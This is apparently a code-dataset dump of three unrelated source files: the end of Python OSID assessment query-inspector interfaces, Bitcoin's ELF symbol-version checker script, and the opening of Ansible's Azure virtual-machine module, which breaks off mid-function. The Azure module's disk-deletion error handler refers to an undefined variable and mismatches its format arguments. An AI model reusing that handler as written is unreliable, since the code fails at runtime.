*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
grade_system_id_terms = property(fget=get_grade_system_id_terms)
@abc.abstractmethod
def get_grade_system_terms(self):
"""Gets the grade system query terms.
:return: the grade system terms
:rtype: ``osid.grading.GradeSystemQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.grading.GradeSystemQueryInspector
grade_system_terms = property(fget=get_grade_system_terms)
@abc.abstractmethod
def get_rubric_id_terms(self):
"""Gets the assessment offered ``Id`` query terms.
:return: the assessment offered ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
rubric_id_terms = property(fget=get_rubric_id_terms)
@abc.abstractmethod
def get_rubric_terms(self):
"""Gets the assessment query terms.
:return: the assessment offered terms
:rtype: ``osid.assessment.AssessmentOfferedQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.AssessmentOfferedQueryInspector
rubric_terms = property(fget=get_rubric_terms)
@abc.abstractmethod
def get_assessment_taken_id_terms(self):
"""Gets the assessment taken ``Id`` query terms.
:return: the assessment taken ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
assessment_taken_id_terms = property(fget=get_assessment_taken_id_terms)
@abc.abstractmethod
def get_assessment_taken_terms(self):
"""Gets the assessment taken query terms.
:return: the assessment taken terms
:rtype: ``osid.assessment.AssessmentTakenQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.AssessmentTakenQueryInspector
assessment_taken_terms = property(fget=get_assessment_taken_terms)
@abc.abstractmethod
def get_bank_id_terms(self):
"""Gets the bank ``Id`` query terms.
:return: the bank ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
bank_id_terms = property(fget=get_bank_id_terms)
@abc.abstractmethod
def get_bank_terms(self):
"""Gets the bank query terms.
:return: the bank terms
:rtype: ``osid.assessment.BankQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.BankQueryInspector
bank_terms = property(fget=get_bank_terms)
@abc.abstractmethod
def get_assessment_offered_query_inspector_record(self, assessment_offered_record_type):
"""Gets the assessment offered query inspector record corresponding to the given ``AssessmentOffered`` record ``Type``.
:param assessment_offered_record_type: an assessment offered record type
:type assessment_offered_record_type: ``osid.type.Type``
:return: the assessment offered query inspector record
:rtype: ``osid.assessment.records.AssessmentOfferedQueryInspectorRecord``
:raise: ``NullArgument`` -- ``assessment_offered_record_type`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unsupported`` -- ``has_record_type(assessment_offered_record_type)`` is ``false``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.records.AssessmentOfferedQueryInspectorRecord
class AssessmentTakenQueryInspector:
"""The query inspectors provide a means of accessing the match terms of a query.
These interfaces are used to examine the actual query terms used in
a search or that may be used to create a smart catalog. Query
inspectors may be converted to ``OsidQuery`` interfaces for reuse or
modification in the search sessions.
"""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def get_assessment_offered_id_terms(self):
"""Gets the assessment offered ``Id`` query terms.
:return: the assessment offered ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
assessment_offered_id_terms = property(fget=get_assessment_offered_id_terms)
@abc.abstractmethod
def get_assessment_offered_terms(self):
"""Gets the assessment offered query terms.
:return: the assessment offered terms
:rtype: ``osid.assessment.AssessmentOfferedQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.AssessmentOfferedQueryInspector
assessment_offered_terms = property(fget=get_assessment_offered_terms)
@abc.abstractmethod
def get_taker_id_terms(self):
"""Gets the resource ``Id`` query terms.
:return: the resource ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
taker_id_terms = property(fget=get_taker_id_terms)
@abc.abstractmethod
def get_taker_terms(self):
"""Gets the resource query terms.
:return: the resource terms
:rtype: ``osid.resource.ResourceQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.resource.ResourceQueryInspector
taker_terms = property(fget=get_taker_terms)
@abc.abstractmethod
def get_taking_agent_id_terms(self):
"""Gets the agent ``Id`` query terms.
:return: the agent ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
taking_agent_id_terms = property(fget=get_taking_agent_id_terms)
@abc.abstractmethod
def get_taking_agent_terms(self):
"""Gets the agent query terms.
:return: the agent terms
:rtype: ``osid.authentication.AgentQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.authentication.AgentQueryInspector
taking_agent_terms = property(fget=get_taking_agent_terms)
@abc.abstractmethod
def get_actual_start_time_terms(self):
"""Gets the start time query terms.
:return: the start time terms
:rtype: ``osid.search.terms.DateTimeTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.DateTimeTerm
actual_start_time_terms = property(fget=get_actual_start_time_terms)
@abc.abstractmethod
def get_completion_time_terms(self):
"""Gets the completion time query terms.
:return: the completion time terms
:rtype: ``osid.search.terms.DateTimeTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.DateTimeTerm
completion_time_terms = property(fget=get_completion_time_terms)
@abc.abstractmethod
def get_time_spent_terms(self):
"""Gets the time spent query terms.
:return: the time spent terms
:rtype: ``osid.search.terms.DurationTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.DurationTerm
time_spent_terms = property(fget=get_time_spent_terms)
@abc.abstractmethod
def get_score_system_id_terms(self):
"""Gets the grade system ``Id`` query terms.
:return: the grade system ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
score_system_id_terms = property(fget=get_score_system_id_terms)
@abc.abstractmethod
def get_score_system_terms(self):
"""Gets the grade system query terms.
:return: the grade system terms
:rtype: ``osid.grading.GradeSystemQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.grading.GradeSystemQueryInspector
score_system_terms = property(fget=get_score_system_terms)
@abc.abstractmethod
def get_score_terms(self):
"""Gets the score query terms.
:return: the score terms
:rtype: ``osid.search.terms.DecimalRangeTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.DecimalRangeTerm
score_terms = property(fget=get_score_terms)
@abc.abstractmethod
def get_grade_id_terms(self):
"""Gets the grade ``Id`` query terms.
:return: the grade ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
grade_id_terms = property(fget=get_grade_id_terms)
@abc.abstractmethod
def get_grade_terms(self):
"""Gets the grade query terms.
:return: the grade terms
:rtype: ``osid.grading.GradeQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.grading.GradeQueryInspector
grade_terms = property(fget=get_grade_terms)
@abc.abstractmethod
def get_feedback_terms(self):
"""Gets the comment query terms.
:return: the comment terms
:rtype: ``osid.search.terms.StringTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.StringTerm
feedback_terms = property(fget=get_feedback_terms)
@abc.abstractmethod
def get_rubric_id_terms(self):
"""Gets the assessment taken ``Id`` query terms.
:return: the assessment taken ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
rubric_id_terms = property(fget=get_rubric_id_terms)
@abc.abstractmethod
def get_rubric_terms(self):
"""Gets the assessment taken query terms.
:return: the assessment taken terms
:rtype: ``osid.assessment.AssessmentTakenQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.AssessmentTakenQueryInspector
rubric_terms = property(fget=get_rubric_terms)
@abc.abstractmethod
def get_bank_id_terms(self):
"""Gets the bank ``Id`` query terms.
:return: the bank ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
bank_id_terms = property(fget=get_bank_id_terms)
@abc.abstractmethod
def get_bank_terms(self):
"""Gets the bank query terms.
:return: the bank terms
:rtype: ``osid.assessment.BankQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.BankQueryInspector
bank_terms = property(fget=get_bank_terms)
@abc.abstractmethod
def get_assessment_taken_query_inspector_record(self, assessment_taken_record_type):
"""Gets the assessment taken query inspector record corresponding to the given ``AssessmentTaken`` record ``Type``.
:param assessment_taken_record_type: an assessment taken record type
:type assessment_taken_record_type: ``osid.type.Type``
:return: the assessment taken query inspector record
:rtype: ``osid.assessment.records.AssessmentTakenQueryInspectorRecord``
:raise: ``NullArgument`` -- ``assessment_taken_record_type`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unsupported`` -- ``has_record_type(assessment_taken_record_type)`` is ``false``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.records.AssessmentTakenQueryInspectorRecord
class BankQueryInspector:
"""The query inspectors provide a means of accessing the match terms of a query.
These interfaces are used to examine the actual query terms used in
a search or that may be used to create a smart catalog. Query
inspectors may be converted to ``OsidQuery`` interfaces for reuse or
modification in the search sessions.
"""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def get_item_id_terms(self):
"""Gets the item ``Id`` query terms.
:return: the item ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
item_id_terms = property(fget=get_item_id_terms)
@abc.abstractmethod
def get_item_terms(self):
"""Gets the item query terms.
:return: the item query terms
:rtype: ``osid.assessment.ItemQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.ItemQueryInspector
item_terms = property(fget=get_item_terms)
@abc.abstractmethod
def get_assessment_id_terms(self):
"""Gets the assessment ``Id`` query terms.
:return: the assessment ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
assessment_id_terms = property(fget=get_assessment_id_terms)
@abc.abstractmethod
def get_assessment_terms(self):
"""Gets the assessment query terms.
:return: the assessment terms
:rtype: ``osid.assessment.AssessmentQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.AssessmentQueryInspector
assessment_terms = property(fget=get_assessment_terms)
@abc.abstractmethod
def get_assessment_offered_id_terms(self):
"""Gets the assessment offered ``Id`` query terms.
:return: the assessment offered ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
assessment_offered_id_terms = property(fget=get_assessment_offered_id_terms)
@abc.abstractmethod
def get_assessment_offered_terms(self):
"""Gets the assessment offered query terms.
:return: the assessment offered terms
:rtype: ``osid.assessment.AssessmentOfferedQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.AssessmentOfferedQueryInspector
assessment_offered_terms = property(fget=get_assessment_offered_terms)
@abc.abstractmethod
def get_ancestor_bank_id_terms(self):
"""Gets the ancestor bank ``Id`` query terms.
:return: the ancestor bank ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
ancestor_bank_id_terms = property(fget=get_ancestor_bank_id_terms)
@abc.abstractmethod
def get_ancestor_bank_terms(self):
"""Gets the ancestor bank query terms.
:return: the ancestor bank terms
:rtype: ``osid.assessment.BankQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.BankQueryInspector
ancestor_bank_terms = property(fget=get_ancestor_bank_terms)
@abc.abstractmethod
def get_descendant_bank_id_terms(self):
"""Gets the descendant bank ``Id`` query terms.
:return: the descendant bank ``Id`` terms
:rtype: ``osid.search.terms.IdTerm``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.search.terms.IdTerm
descendant_bank_id_terms = property(fget=get_descendant_bank_id_terms)
@abc.abstractmethod
def get_descendant_bank_terms(self):
"""Gets the descendant bank query terms.
:return: the descendant bank terms
:rtype: ``osid.assessment.BankQueryInspector``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.BankQueryInspector
descendant_bank_terms = property(fget=get_descendant_bank_terms)
@abc.abstractmethod
def get_bank_query_inspector_record(self, bank_record_type):
"""Gets the bank query inspector record corresponding to the given ``Bank`` record ``Type``.
:param bank_record_type: a bank record type
:type bank_record_type: ``osid.type.Type``
:return: the bank query inspector record
:rtype: ``osid.assessment.records.BankQueryInspectorRecord``
:raise: ``NullArgument`` -- ``bank_record_type`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``Unsupported`` -- ``has_record_type(bank_record_type)`` is ``false``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.assessment.records.BankQueryInspectorRecord
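# --- Illustrative sketch (not part of the OSID specification) ---
# A concrete implementation of one of these inspectors would typically expose
# the terms captured by a corresponding query object. A hypothetical in-memory
# BankQueryInspector might look roughly like this:
#
#     class InMemoryBankQueryInspector(BankQueryInspector):
#         """Hypothetical inspector backed by a dict of captured terms."""
#
#         def __init__(self, terms):
#             self._terms = terms  # e.g. {'item_id': [<IdTerm>, ...]}
#
#         def get_item_id_terms(self):
#             return self._terms.get('item_id', [])
#
#         def get_item_terms(self):
#             return self._terms.get('item', [])
#
# The remaining getters would follow the same pattern, and the record-type
# methods would raise Unsupported for record types they do not recognize.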
| mit | -1,241,202,665,486,583,600 | 28.48621 | 127 | 0.651264 | false |
gavinandresen/bitcoin-git | contrib/devtools/symbol-check.py | 52 | 6191 | #!/usr/bin/python2
# Copyright (c) 2014 Wladimir J. van der Laan
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''
A script to check that the (Linux) executables produced by gitian only contain
allowed gcc, glibc and libstdc++ version symbols. This makes sure they are
still compatible with the minimum supported Linux distribution versions.
Example usage:
find ../gitian-builder/build -type f -executable | xargs python contrib/devtools/symbol-check.py
'''
from __future__ import division, print_function, unicode_literals
import subprocess
import re
import sys
import os
# Debian 6.0.9 (Squeeze) has:
#
# - g++ version 4.4.5 (https://packages.debian.org/search?suite=default§ion=all&arch=any&searchon=names&keywords=g%2B%2B)
# - libc version 2.11.3 (https://packages.debian.org/search?suite=default§ion=all&arch=any&searchon=names&keywords=libc6)
# - libstdc++ version 4.4.5 (https://packages.debian.org/search?suite=default§ion=all&arch=any&searchon=names&keywords=libstdc%2B%2B6)
#
# Ubuntu 10.04.4 (Lucid Lynx) has:
#
# - g++ version 4.4.3 (http://packages.ubuntu.com/search?keywords=g%2B%2B&searchon=names&suite=lucid§ion=all)
# - libc version 2.11.1 (http://packages.ubuntu.com/search?keywords=libc6&searchon=names&suite=lucid§ion=all)
# - libstdc++ version 4.4.3 (http://packages.ubuntu.com/search?suite=lucid§ion=all&arch=any&keywords=libstdc%2B%2B&searchon=names)
#
# Taking the minimum of these as our target.
#
# According to GNU ABI document (http://gcc.gnu.org/onlinedocs/libstdc++/manual/abi.html) this corresponds to:
# GCC 4.4.0: GCC_4.4.0
# GCC 4.4.2: GLIBCXX_3.4.13, CXXABI_1.3.3
# (glibc) GLIBC_2_11
#
MAX_VERSIONS = {
'GCC': (4,4,0),
'CXXABI': (1,3,3),
'GLIBCXX': (3,4,13),
'GLIBC': (2,11)
}
# See here for a description of _IO_stdin_used:
# https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=634261#109
# Ignore symbols that are exported as part of every executable
IGNORE_EXPORTS = {
b'_edata', b'_end', b'_init', b'__bss_start', b'_fini', b'_IO_stdin_used'
}
READELF_CMD = os.getenv('READELF', '/usr/bin/readelf')
CPPFILT_CMD = os.getenv('CPPFILT', '/usr/bin/c++filt')
# Allowed NEEDED libraries
ALLOWED_LIBRARIES = {
# bitcoind and bitcoin-qt
b'libgcc_s.so.1', # GCC base support
b'libc.so.6', # C library
b'libpthread.so.0', # threading
b'libanl.so.1', # DNS resolve
b'libm.so.6', # math library
b'librt.so.1', # real-time (clock)
b'ld-linux-x86-64.so.2', # 64-bit dynamic linker
b'ld-linux.so.2', # 32-bit dynamic linker
# bitcoin-qt only
b'libX11-xcb.so.1', # part of X11
b'libX11.so.6', # part of X11
b'libxcb.so.1', # part of X11
b'libfontconfig.so.1', # font support
b'libfreetype.so.6', # font parsing
b'libdl.so.2' # programming interface to dynamic linker
}
class CPPFilt(object):
'''
Demangle C++ symbol names.
Use a pipe to the 'c++filt' command.
'''
def __init__(self):
self.proc = subprocess.Popen(CPPFILT_CMD, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
def __call__(self, mangled):
self.proc.stdin.write(mangled + b'\n')
self.proc.stdin.flush()
return self.proc.stdout.readline().rstrip()
def close(self):
self.proc.stdin.close()
self.proc.stdout.close()
self.proc.wait()
def read_symbols(executable, imports=True):
'''
Parse an ELF executable and return a list of (symbol,version) tuples
for dynamic, imported symbols.
'''
p = subprocess.Popen([READELF_CMD, '--dyn-syms', '-W', executable], stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
(stdout, stderr) = p.communicate()
if p.returncode:
raise IOError('Could not read symbols for %s: %s' % (executable, stderr.strip()))
syms = []
for line in stdout.split(b'\n'):
line = line.split()
if len(line)>7 and re.match(b'[0-9]+:$', line[0]):
(sym, _, version) = line[7].partition(b'@')
is_import = line[6] == b'UND'
if version.startswith(b'@'):
version = version[1:]
if is_import == imports:
syms.append((sym, version))
return syms
def check_version(max_versions, version):
if b'_' in version:
(lib, _, ver) = version.rpartition(b'_')
else:
lib = version
ver = '0'
ver = tuple([int(x) for x in ver.split(b'.')])
if not lib in max_versions:
return False
return ver <= max_versions[lib]
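# Illustrative (hypothetical) inputs showing how check_version interprets a
# versioned symbol produced by read_symbols:
#   check_version(MAX_VERSIONS, b'GLIBC_2.11')      -> True  (2.11 <= 2.11)
#   check_version(MAX_VERSIONS, b'GLIBCXX_3.4.14')  -> False (newer than 3.4.13)
#   check_version(MAX_VERSIONS, b'OPENSSL_1.0.0')   -> False (library not listed)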
def read_libraries(filename):
p = subprocess.Popen([READELF_CMD, '-d', '-W', filename], stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
(stdout, stderr) = p.communicate()
if p.returncode:
raise IOError('Error opening file')
libraries = []
for line in stdout.split(b'\n'):
tokens = line.split()
if len(tokens)>2 and tokens[1] == b'(NEEDED)':
match = re.match(b'^Shared library: \[(.*)\]$', b' '.join(tokens[2:]))
if match:
libraries.append(match.group(1))
else:
raise ValueError('Unparseable (NEEDED) specification')
return libraries
if __name__ == '__main__':
cppfilt = CPPFilt()
retval = 0
for filename in sys.argv[1:]:
# Check imported symbols
for sym,version in read_symbols(filename, True):
if version and not check_version(MAX_VERSIONS, version):
print('%s: symbol %s from unsupported version %s' % (filename, cppfilt(sym).decode('utf-8'), version.decode('utf-8')))
retval = 1
# Check exported symbols
for sym,version in read_symbols(filename, False):
if sym in IGNORE_EXPORTS:
continue
print('%s: export of symbol %s not allowed' % (filename, cppfilt(sym).decode('utf-8')))
retval = 1
# Check dependency libraries
for library_name in read_libraries(filename):
if library_name not in ALLOWED_LIBRARIES:
print('%s: NEEDED library %s is not allowed' % (filename, library_name.decode('utf-8')))
retval = 1
exit(retval)
| mit | 8,518,517,211,503,953,000 | 36.75 | 142 | 0.641415 | false |
lowwalker/ansible-modules-core | cloud/azure/azure.py | 6 | 24078 | #!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: azure
short_description: create or terminate a virtual machine in azure
description:
    - Creates or terminates azure instances. When creating, optionally waits for the instance to reach the 'running' state.
version_added: "1.7"
options:
name:
description:
- name of the virtual machine and associated cloud service.
required: true
default: null
location:
description:
- the azure location to use (e.g. 'East US')
required: true
default: null
subscription_id:
description:
- azure subscription id. Overrides the AZURE_SUBSCRIPTION_ID environment variable.
required: false
default: null
management_cert_path:
description:
- path to an azure management certificate associated with the subscription id. Overrides the AZURE_CERT_PATH environment variable.
required: false
default: null
storage_account:
description:
- the azure storage account in which to store the data disks.
required: true
image:
description:
- system image for creating the virtual machine (e.g., b39f27a8b8c64d52b05eac6a62ebad85__Ubuntu_DAILY_BUILD-precise-12_04_3-LTS-amd64-server-20131205-en-us-30GB)
required: true
default: null
role_size:
description:
      - azure role size for the new virtual machine (e.g., Small, ExtraLarge, A6). Note that instances of type G and DS are not available in all regions (locations); make sure the size and type of instance you select are available in your chosen location.
required: false
default: Small
endpoints:
description:
- a comma-separated list of TCP ports to expose on the virtual machine (e.g., "22,80")
required: false
default: 22
user:
description:
- the unix username for the new virtual machine.
required: false
default: null
password:
description:
- the unix password for the new virtual machine.
required: false
default: null
ssh_cert_path:
description:
- path to an X509 certificate containing the public ssh key to install in the virtual machine. See http://www.windowsazure.com/en-us/manage/linux/tutorials/intro-to-linux/ for more details.
- if this option is specified, password-based ssh authentication will be disabled.
required: false
default: null
virtual_network_name:
description:
- Name of virtual network.
required: false
default: null
hostname:
description:
      - hostname to write to /etc/hostname. Defaults to <name>.cloudapp.net.
required: false
default: null
wait:
description:
- wait for the instance to be in state 'running' before returning
required: false
default: "no"
choices: [ "yes", "no" ]
aliases: []
wait_timeout:
description:
- how long before wait gives up, in seconds
default: 600
aliases: []
wait_timeout_redirects:
description:
- how long before wait gives up for redirects, in seconds
default: 300
aliases: []
state:
description:
- create or terminate instances
required: false
default: 'present'
aliases: []
auto_updates:
description:
- Enable Auto Updates on Windows Machines
required: false
version_added: "2.0"
default: "no"
choices: [ "yes", "no" ]
enable_winrm:
description:
- Enable winrm on Windows Machines
required: false
version_added: "2.0"
default: "yes"
choices: [ "yes", "no" ]
os_type:
description:
      - The type of the OS that is being provisioned
required: false
version_added: "2.0"
default: "linux"
choices: [ "windows", "linux" ]
requirements:
- "python >= 2.6"
- "azure >= 0.7.1"
author: "John Whitbeck (@jwhitbeck)"
'''
EXAMPLES = '''
# Note: None of these examples set subscription_id or management_cert_path
# It is assumed that their matching environment variables are set.
# Provision virtual machine example
- local_action:
module: azure
name: my-virtual-machine
role_size: Small
image: b39f27a8b8c64d52b05eac6a62ebad85__Ubuntu_DAILY_BUILD-precise-12_04_3-LTS-amd64-server-20131205-en-us-30GB
location: 'East US'
user: ubuntu
ssh_cert_path: /path/to/azure_x509_cert.pem
storage_account: my-storage-account
wait: yes
# Terminate virtual machine example
- local_action:
module: azure
name: my-virtual-machine
state: absent
#Create windows machine
- hosts: all
connection: local
tasks:
- local_action:
module: azure
name: "ben-Winows-23"
hostname: "win123"
os_type: windows
enable_winrm: yes
subscription_id: "{{ azure_sub_id }}"
management_cert_path: "{{ azure_cert_path }}"
role_size: Small
image: 'bd507d3a70934695bc2128e3e5a255ba__RightImage-Windows-2012-x64-v13.5'
location: 'East Asia'
password: "xxx"
storage_account: benooytes
user: admin
wait: yes
virtual_network_name: "{{ vnet_name }}"
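
# Note: ssh_cert_path expects an X509 certificate file. For testing, a
# self-signed certificate can typically be generated with openssl (the file
# names below are placeholders only):
#
#   openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
#     -keyout azure_rsa.key -out azure_x509_cert.pem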
'''
import base64
import datetime
import os
import signal
import time
from urlparse import urlparse
from ansible.module_utils.facts import * # TimeoutError
AZURE_LOCATIONS = ['South Central US',
'Central US',
'East US 2',
'East US',
'West US',
'North Central US',
'North Europe',
'West Europe',
'East Asia',
'Southeast Asia',
'Japan West',
'Japan East',
'Brazil South']
AZURE_ROLE_SIZES = ['ExtraSmall',
'Small',
'Medium',
'Large',
'ExtraLarge',
'A5',
'A6',
'A7',
'A8',
'A9',
'Basic_A0',
'Basic_A1',
'Basic_A2',
'Basic_A3',
'Basic_A4',
'Standard_D1',
'Standard_D2',
'Standard_D3',
'Standard_D4',
'Standard_D11',
'Standard_D12',
'Standard_D13',
'Standard_D14',
'Standard_DS1',
'Standard_DS2',
'Standard_DS3',
'Standard_DS4',
'Standard_DS11',
'Standard_DS12',
'Standard_DS13',
'Standard_DS14',
'Standard_G1',
'Standard_G2',
'Standard_G3',
'Standard_G4',
'Standard_G5']
from distutils.version import LooseVersion
try:
import azure as windows_azure
if hasattr(windows_azure, '__version__') and LooseVersion(windows_azure.__version__) <= "0.11.1":
from azure import WindowsAzureError as AzureException
from azure import WindowsAzureMissingResourceError as AzureMissingException
else:
from azure.common import AzureException as AzureException
from azure.common import AzureMissingResourceHttpError as AzureMissingException
from azure.servicemanagement import (ServiceManagementService, OSVirtualHardDisk, SSH, PublicKeys,
PublicKey, LinuxConfigurationSet, ConfigurationSetInputEndpoints,
ConfigurationSetInputEndpoint, Listener, WindowsConfigurationSet)
HAS_AZURE = True
except ImportError:
HAS_AZURE = False
from types import MethodType
import json
def _wait_for_completion(azure, promise, wait_timeout, msg):
if not promise: return
wait_timeout = time.time() + wait_timeout
while wait_timeout > time.time():
operation_result = azure.get_operation_status(promise.request_id)
time.sleep(5)
if operation_result.status == "Succeeded":
return
raise AzureException('Timed out waiting for async operation ' + msg + ' "' + str(promise.request_id) + '" to complete.')
def _delete_disks_when_detached(azure, wait_timeout, disk_names):
def _handle_timeout(signum, frame):
raise TimeoutError("Timeout reached while waiting for disks to become detached.")
signal.signal(signal.SIGALRM, _handle_timeout)
signal.alarm(wait_timeout)
try:
while len(disk_names) > 0:
for disk_name in disk_names:
disk = azure.get_disk(disk_name)
if disk.attached_to is None:
azure.delete_disk(disk.name, True)
disk_names.remove(disk_name)
except AzureException, e:
module.fail_json(msg="failed to get or delete disk, error was: %s" % (disk_name, str(e)))
finally:
signal.alarm(0)
def get_ssh_certificate_tokens(module, ssh_cert_path):
"""
Returns the sha1 fingerprint and a base64-encoded PKCS12 version of the certificate.
"""
# This returns a string such as SHA1 Fingerprint=88:60:0B:13:A9:14:47:DA:4E:19:10:7D:34:92:2B:DF:A1:7D:CA:FF
rc, stdout, stderr = module.run_command(['openssl', 'x509', '-in', ssh_cert_path, '-fingerprint', '-noout'])
if rc != 0:
module.fail_json(msg="failed to generate the key fingerprint, error was: %s" % stderr)
fingerprint = stdout.strip()[17:].replace(':', '')
rc, stdout, stderr = module.run_command(['openssl', 'pkcs12', '-export', '-in', ssh_cert_path, '-nokeys', '-password', 'pass:'])
if rc != 0:
module.fail_json(msg="failed to generate the pkcs12 signature from the certificate, error was: %s" % stderr)
pkcs12_base64 = base64.b64encode(stdout.strip())
return (fingerprint, pkcs12_base64)
def create_virtual_machine(module, azure):
"""
Create new virtual machine
module : AnsibleModule object
azure: authenticated azure ServiceManagementService object
Returns:
True if a new virtual machine and/or cloud service was created, false otherwise
"""
name = module.params.get('name')
os_type = module.params.get('os_type')
hostname = module.params.get('hostname') or name + ".cloudapp.net"
endpoints = module.params.get('endpoints').split(',')
ssh_cert_path = module.params.get('ssh_cert_path')
user = module.params.get('user')
password = module.params.get('password')
location = module.params.get('location')
role_size = module.params.get('role_size')
storage_account = module.params.get('storage_account')
image = module.params.get('image')
virtual_network_name = module.params.get('virtual_network_name')
wait = module.params.get('wait')
wait_timeout = int(module.params.get('wait_timeout'))
changed = False
# Check if a deployment with the same name already exists
cloud_service_name_available = azure.check_hosted_service_name_availability(name)
if cloud_service_name_available.result:
# cloud service does not exist; create it
try:
result = azure.create_hosted_service(service_name=name, label=name, location=location)
_wait_for_completion(azure, result, wait_timeout, "create_hosted_service")
changed = True
except AzureException, e:
module.fail_json(msg="failed to create the new service, error was: %s" % str(e))
try:
# check to see if a vm with this name exists; if so, do nothing
azure.get_role(name, name, name)
except AzureMissingException:
# vm does not exist; create it
if os_type == 'linux':
# Create linux configuration
disable_ssh_password_authentication = not password
vm_config = LinuxConfigurationSet(hostname, user, password, disable_ssh_password_authentication)
else:
#Create Windows Config
vm_config = WindowsConfigurationSet(hostname, password, None, module.params.get('auto_updates'), None, user)
vm_config.domain_join = None
if module.params.get('enable_winrm'):
listener = Listener('Http')
vm_config.win_rm.listeners.listeners.append(listener)
else:
vm_config.win_rm = None
# Add ssh certificates if specified
if ssh_cert_path:
fingerprint, pkcs12_base64 = get_ssh_certificate_tokens(module, ssh_cert_path)
# Add certificate to cloud service
result = azure.add_service_certificate(name, pkcs12_base64, 'pfx', '')
_wait_for_completion(azure, result, wait_timeout, "add_service_certificate")
# Create ssh config
ssh_config = SSH()
ssh_config.public_keys = PublicKeys()
authorized_keys_path = u'/home/%s/.ssh/authorized_keys' % user
ssh_config.public_keys.public_keys.append(PublicKey(path=authorized_keys_path, fingerprint=fingerprint))
# Append ssh config to linux machine config
vm_config.ssh = ssh_config
# Create network configuration
network_config = ConfigurationSetInputEndpoints()
network_config.configuration_set_type = 'NetworkConfiguration'
network_config.subnet_names = []
network_config.public_ips = None
for port in endpoints:
network_config.input_endpoints.append(ConfigurationSetInputEndpoint(name='TCP-%s' % port,
protocol='TCP',
port=port,
local_port=port))
# First determine where to store disk
today = datetime.date.today().strftime('%Y-%m-%d')
disk_prefix = u'%s-%s' % (name, name)
